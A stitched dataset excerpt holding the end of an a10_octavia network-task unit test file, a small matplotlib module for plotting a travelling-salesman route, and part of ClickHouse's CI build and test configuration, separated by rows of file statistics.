VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_2],
is_partition=False)
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_2)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_2)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_replace_floating_ip_in_specified_partition_with_static_ip(
self, mock_utils, mock_patched_ip, get_floating_ip):
vrid = copy.deepcopy(VRID_1)
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_2))
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
vthunder.partition_name = 'partition_1'
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_L3V_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
vrid, None, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FLOATING_IP_2)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[
a10constants.MOCK_VRID_FLOATING_IP_2], is_partition=True)
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
def test_HandleVRIDFloatingIP_noop_given_same_subnet_with_conf_fip_set_to_dhcp(
self, get_floating_ip):
vrid = copy.deepcopy(VRID_1)
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
fip_port = mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_not_called()
self.network_driver_mock.delete_port.assert_not_called()
self.assertEqual(fip_port, [vrid])
@mock.patch(
'a10_octavia.common.utils.check_ip_in_subnet_range',
return_value=False)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_replace_floating_ip_diff_subnet_in_shared_part_conf_fip_set_dhcp(
self, mock_utils, get_floating_ip, check_subnet):
vrid = copy.deepcopy(VRID_1)
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
vrid, subnet.network_id, mock.ANY, fixed_ip=None)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_1],
is_partition=False)
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
@mock.patch('a10_octavia.common.utils.check_ip_in_subnet_range',
return_value=False)
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_replace_floating_ip_diff_subnet_in_set_part_conf_fip_set_dhcp(
self, mock_utils, get_floating_ip, check_subnet):
vrid = copy.deepcopy(VRID_1)
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
vthunder = copy.deepcopy(VTHUNDER)
vthunder.partition_name = 'partition_1'
vthunder.ip_address = '10.0.0.1'
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_L3V_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
vrid, subnet.network_id, mock.ANY, fixed_ip=None)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[
a10constants.MOCK_VRID_FLOATING_IP_1], is_partition=True)
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_PARTIAL_FLOATING_IP)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_creating_floating_ip_conf_fip_is_partial(
self, get_floating_ip, mock_utils):
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FULL_FLOATING_IP))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [VRID_1], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, subnet.network_id, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FULL_FLOATING_IP)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FULL_FLOATING_IP],
is_partition=False)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_DeleteMemberVRIDPort_delete_vrid_ip_member_count_equals_one(self, mock_utils):
mock_network_task = a10_network_tasks.DeleteVRIDPort()
vrid = copy.deepcopy(VRID_1)
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
vrid.vrid = VRID_VALUE
mock_network_task.axapi_client = self.client_mock
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
result = mock_network_task.execute(VTHUNDER, [vrid], SUBNET_1, False,
0, 1, 0, 0, MEMBER)
self.network_driver_mock.deallocate_vrid_fip.assert_called_with(
vrid, mock.ANY, mock.ANY)
self.client_mock.vrrpa.update.assert_called_with(
vrid.vrid, floating_ips=[])
self.assertEqual(result, (vrid, True))
def test_DeleteMemberVRIDPort_member_count_lb_count(self):
mock_network_task = a10_network_tasks.DeleteVRIDPort()
mock_network_task.axapi_client = self.client_mock
result = mock_network_task.execute(VTHUNDER, [VRID_1], SUBNET_1, False,
1, 1, 0, 0, MEMBER)
self.network_driver_mock.deallocate_vrid_fip.assert_not_called()
self.client_mock.vrrpa.delete.assert_not_called()
self.assertEqual(result, (None, False))
def delete_multi_vrid_port_against_subnet_not_used(self):
mock_network_task = a10_network_tasks.DeleteVRIDPort()
vrid = copy.deepcopy(VRID_1)
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
vrid.vrid = VRID_VALUE
mock_network_task.axapi_client = self.client_mock
result = mock_network_task.execute(VTHUNDER, [vrid], [SUBNET_1])
self.network_driver_mock.delete_port.assert_called_with(
a10constants.MOCK_VRRP_PORT_ID)
self.client_mock.vrrpa.update.assert_called_with(
vrid.vrid, floating_ips=[], is_partiton=False)
self.assertEqual(result, [])
def delete_multi_vrid_port_against_all_subnet_used(self):
mock_network_task = a10_network_tasks.DeleteVRIDPort()
vrid = copy.deepcopy(VRID_1)
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
vrid.vrid = VRID_VALUE
mock_network_task.axapi_client = self.client_mock
result = mock_network_task.execute(VTHUNDER, [vrid], [])
self.network_driver_mock.delete_port.assert_not_called()
self.client_mock.vrrpa.update.assert_not_called()
self.assertEqual(result, None)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_reserve_subnet_addr_for_member(self, mock_utils):
mock_network_task = a10_network_tasks.ReserveSubnetAddressForMember()
mock_network_task.network_driver = self.client_mock
mock_network_task.execute(MEMBER, NAT_FLAVOR)
self.client_mock.reserve_subnet_addresses.assert_called_with(
MEMBER.subnet_id, ["1.1.1.1", "1.1.1.2"], mock.ANY)
def test_release_subnet_addr_referenced(self):
mock_network_task = a10_network_tasks.ReleaseSubnetAddressForMember()
NAT_POOL.member_ref_count = 2
ret_val = mock_network_task.execute(MEMBER, NAT_FLAVOR, NAT_POOL)
self.assertEqual(ret_val, None)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_release_subnet_addr(self, mock_utils):
mock_network_task = a10_network_tasks.ReleaseSubnetAddressForMember()
mock_network_task.network_driver = self.client_mock
NAT_POOL.member_ref_count = 1
mock_network_task.execute(MEMBER, NAT_FLAVOR, NAT_POOL)
self.client_mock.delete_port.assert_called_with(NAT_POOL.port_id)
def test_PlugNetworksByID(self):
net_task = a10_network_tasks.PlugNetworksByID()
net_task.network_driver = self.client_mock
vthunder = copy.deepcopy(VTHUNDER)
NET_LIST = [1, 2, 3]
net_task.network_driver.get_plugged_networks.return_value = []
added_list = net_task.execute(vthunder, NET_LIST)
self.assertEqual(added_list, NET_LIST)
def test_GetVThunderNetworkList(self):
net_task = a10_network_tasks.GetVThunderNetworkList()
net_task.network_driver = self.client_mock
vthunder = copy.deepcopy(VTHUNDER)
nics = [MockNic(1), MockNic(2)]
net_task.network_driver.get_plugged_networks.return_value = nics
net_list = net_task.execute(vthunder)
self.assertEqual(net_list, [1, 2])
| 51.275974
| 99
| 0.719274
| 4,144
| 31,586
| 5.086149
| 0.061052
| 0.041752
| 0.044836
| 0.043839
| 0.879347
| 0.85776
| 0.842672
| 0.831285
| 0.820088
| 0.803293
| 0
| 0.030115
| 0.195751
| 31,586
| 615
| 100
| 51.35935
| 0.799591
| 0.018299
| 0
| 0.737589
| 0
| 0
| 0.091446
| 0.070504
| 0
| 0
| 0
| 0
| 0.088652
| 1
| 0.047872
| false
| 0.003546
| 0.024823
| 0
| 0.078014
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ef369080f185bb9d2bbafca02ca6c9e0c3541c5
| 1,778
|
py
|
Python
|
src/plot.py
|
steveandpeggyb/walking-salesman
|
0d8f9c5285f906774d67d81f8ae9c1b4b75098ef
|
[
"MIT"
] | 1,760
|
2018-01-22T13:41:46.000Z
|
2022-03-30T07:13:32.000Z
|
src/plot.py
|
bulentongun/som-tsp
|
0d8f9c5285f906774d67d81f8ae9c1b4b75098ef
|
[
"MIT"
] | 6
|
2018-01-21T17:33:29.000Z
|
2021-01-23T19:29:47.000Z
|
src/plot.py
|
bulentongun/som-tsp
|
0d8f9c5285f906774d67d81f8ae9c1b4b75098ef
|
[
"MIT"
] | 347
|
2018-01-21T17:22:35.000Z
|
2022-02-17T07:22:07.000Z
|
import matplotlib.pyplot as plt
import matplotlib as mpl
def plot_network(cities, neurons, name='diagram.png', ax=None):
"""Plot a graphical representation of the problem"""
mpl.rcParams['agg.path.chunksize'] = 10000
if not ax:
fig = plt.figure(figsize=(5, 5), frameon = False)
axis = fig.add_axes([0,0,1,1])
axis.set_aspect('equal', adjustable='datalim')
plt.axis('off')
axis.scatter(cities['x'], cities['y'], color='red', s=4)
axis.plot(neurons[:,0], neurons[:,1], 'r.', ls='-', color='#0063ba', markersize=2)
plt.savefig(name, bbox_inches='tight', pad_inches=0, dpi=200)
plt.close()
else:
ax.scatter(cities['x'], cities['y'], color='red', s=4)
ax.plot(neurons[:,0], neurons[:,1], 'r.', ls='-', color='#0063ba', markersize=2)
return ax
def plot_route(cities, route, name='diagram.png', ax=None):
"""Plot a graphical representation of the route obtained"""
mpl.rcParams['agg.path.chunksize'] = 10000
if not ax:
fig = plt.figure(figsize=(5, 5), frameon = False)
axis = fig.add_axes([0,0,1,1])
axis.set_aspect('equal', adjustable='datalim')
plt.axis('off')
axis.scatter(cities['x'], cities['y'], color='red', s=4)
route = cities.reindex(route)
route.loc[route.shape[0]] = route.iloc[0]
axis.plot(route['x'], route['y'], color='purple', linewidth=1)
plt.savefig(name, bbox_inches='tight', pad_inches=0, dpi=200)
plt.close()
else:
ax.scatter(cities['x'], cities['y'], color='red', s=4)
route = cities.reindex(route)
route.loc[route.shape[0]] = route.iloc[0]
ax.plot(route['x'], route['y'], color='purple', linewidth=1)
return ax
| 34.862745
| 90
| 0.590551
| 252
| 1,778
| 4.126984
| 0.301587
| 0.034615
| 0.053846
| 0.076923
| 0.859615
| 0.859615
| 0.859615
| 0.859615
| 0.859615
| 0.788462
| 0
| 0.038821
| 0.21766
| 1,778
| 50
| 91
| 35.56
| 0.708843
| 0.056243
| 0
| 0.777778
| 0
| 0
| 0.092382
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1610a416b91b19c56aac02be25020e3d3d5b521e
| 841
|
py
|
Python
|
src/kaa/transitions.py
|
mmicek/kaa
|
3583edf19b0e453c7de6c316a08d9eda72a1fcfc
|
[
"MIT"
] | 17
|
2019-07-10T12:24:53.000Z
|
2022-02-19T21:39:19.000Z
|
src/kaa/transitions.py
|
mmicek/kaa
|
3583edf19b0e453c7de6c316a08d9eda72a1fcfc
|
[
"MIT"
] | 29
|
2019-07-10T12:30:58.000Z
|
2021-12-30T15:33:44.000Z
|
src/kaa/transitions.py
|
mmicek/kaa
|
3583edf19b0e453c7de6c316a08d9eda72a1fcfc
|
[
"MIT"
] | 8
|
2019-03-26T23:08:40.000Z
|
2022-01-10T03:39:59.000Z
|
from ._kaa import (
NodeTransition, NodeTransitionsSequence, NodeTransitionsParallel,
NodeCustomTransition, AttributeTransitionMethod, NodePositionTransition,
NodeRotationTransition, NodeScaleTransition, NodeColorTransition,
BodyNodeVelocityTransition, BodyNodeAngularVelocityTransition, NodeTransitionDelay,
NodeTransitionCallback, NodeSpriteTransition, NodeZIndexSteppingTransition,
)
__all__ = (
'NodeTransition', 'NodeTransitionsSequence', 'NodeTransitionsParallel',
'NodeCustomTransition', 'AttributeTransitionMethod', 'NodePositionTransition',
'NodeRotationTransition', 'NodeScaleTransition', 'NodeColorTransition',
'BodyNodeVelocityTransition', 'BodyNodeAngularVelocityTransition',
'NodeTransitionDelay', 'NodeTransitionCallback', 'NodeSpriteTransition',
'NodeZIndexSteppingTransition'
)
| 46.722222
| 87
| 0.821641
| 34
| 841
| 20.176471
| 0.558824
| 0.107872
| 0.174927
| 0.233236
| 0.976676
| 0.976676
| 0.976676
| 0.976676
| 0.976676
| 0.976676
| 0
| 0
| 0.10107
| 841
| 17
| 88
| 49.470588
| 0.907407
| 0
| 0
| 0
| 0
| 0
| 0.398335
| 0.26635
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
161f50fed200559c8174c71ca3ad6e1160d2df4d
| 25,030
|
py
|
Python
|
tests/ci/ci_config.py
|
newly12/ClickHouse
|
e1c2e629d8c077193f951cdb02fac9c0b1631c65
|
[
"Apache-2.0"
] | 1
|
2020-10-01T17:13:22.000Z
|
2020-10-01T17:13:22.000Z
|
tests/ci/ci_config.py
|
zhaoqiang75/ClickHouse
|
c86b43c7efc1c0cc9c66eb3c7d1274326378ce1b
|
[
"Apache-2.0"
] | null | null | null |
tests/ci/ci_config.py
|
zhaoqiang75/ClickHouse
|
c86b43c7efc1c0cc9c66eb3c7d1274326378ce1b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
CI_CONFIG = {
"build_config": [
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"alien_pkgs": True,
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "",
"package_type": "performance",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "gcc-11",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "address",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "undefined",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "thread",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "memory",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "debug",
"sanitizer": "",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
}
],
"special_build_config": [
{
"compiler": "clang-13",
"build_type": "debug",
"sanitizer": "",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "enable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "splitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-darwin",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-aarch64",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-freebsd",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-darwin-aarch64",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-ppc64le",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
}
],
"tests_config": {
"Stateful tests (address, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (thread, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (memory, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (ubsan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (debug, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "debug",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (release, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (release, DatabaseOrdinary, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (release, DatabaseReplicated, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (address, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (thread, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (memory, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (ubsan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (debug, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "debug",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (release, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (release, wide parts enabled, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (release, DatabaseOrdinary, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (release, DatabaseReplicated, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (address, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (thread, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (undefined, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (memory, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (debug, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "debug",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests (asan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests (thread, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests (release, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests (memory, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests flaky check (asan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Compatibility check (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Split build smoke test (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "binary",
"build_type": "relwithdebuginfo",
